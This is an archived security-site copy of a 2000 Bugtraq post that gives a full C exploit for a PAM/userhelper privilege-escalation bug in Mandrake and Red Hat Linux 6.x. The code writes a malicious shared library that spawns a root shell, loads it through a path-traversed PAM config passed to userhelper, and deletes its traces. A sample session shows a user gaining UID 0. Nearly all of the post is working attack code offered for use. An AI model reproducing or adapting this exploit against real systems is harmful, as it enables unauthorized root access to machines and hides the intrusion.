Computer Security

Archive : 2000 : january : pam2
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku





Exploit for Mandrake 6.1 (PAM/userhelper bug)




Exploit for Mandrake 6.1 (PAM/userhelper bug)






=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Ср, 15 мар 2000  03:14:05

   От: Paulo Ribeiro <prrar@NITNET.COM.BR>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: Exploit for Mandrake 6.1 (PAM/userhelper bug)

--------------------------------------------------------------------------------




/*

 * pam-mdk.c (C) 2000 Paulo Ribeiro

 *

 * DESCRIPTION:

 * -----------

 * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its

 * exploit (pamslam.sh) doesn't work on it (at least on my machine). So,

 * I created this C program based on it which exploits PAM/userhelper

 * and gives you UID 0.

 *

 * SYSTEMS TESTED:

 * --------------

 * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1.

 *

 * RESULTS:

 * -------

 * [prrar@linux prrar]$ id

 * uid=501(prrar) gid=501(prrar) groups=501(prrar)

 * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk

 * [prrar@linux prrar]$ ./pam-mdk

 * sh-2.03# id

 * uid=0(root) gid=501(prrar) groups=501(prrar)

 * sh-2.03#

 */



#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>



int main(int argc, char *argv[])

{

        FILE *fp;



        strcpy(argv[0], "vi test.txt");



        fp = fopen("abc.c", "a");

        fprintf(fp, "#include<stdlib.h>\n");

        fprintf(fp, "#include<unistd.h>\n");

        fprintf(fp, "#include<sys/types.h>\n");

        fprintf(fp, "void _init(void) {\n");

        fprintf(fp, "\tsetuid(geteuid());\n");

        fprintf(fp, "\tsystem(\"/bin/sh\");\n");

        fprintf(fp, "}");

        fclose(fp);



        system("echo -e auth\trequired\t$PWD/abc.so > abc.conf");

        system("chmod 755 abc.conf");

        system("gcc -fPIC -o abc.o -c abc.c");

        system("ld -shared -o abc.so abc.o");

        system("chmod 755 abc.so");

        system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf");

        system("rm -rf abc.*");

}



/* pam-mdk.c: EOF */



___________________________________

Paulo Ribeiro   prrar@nitnet.com.br
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru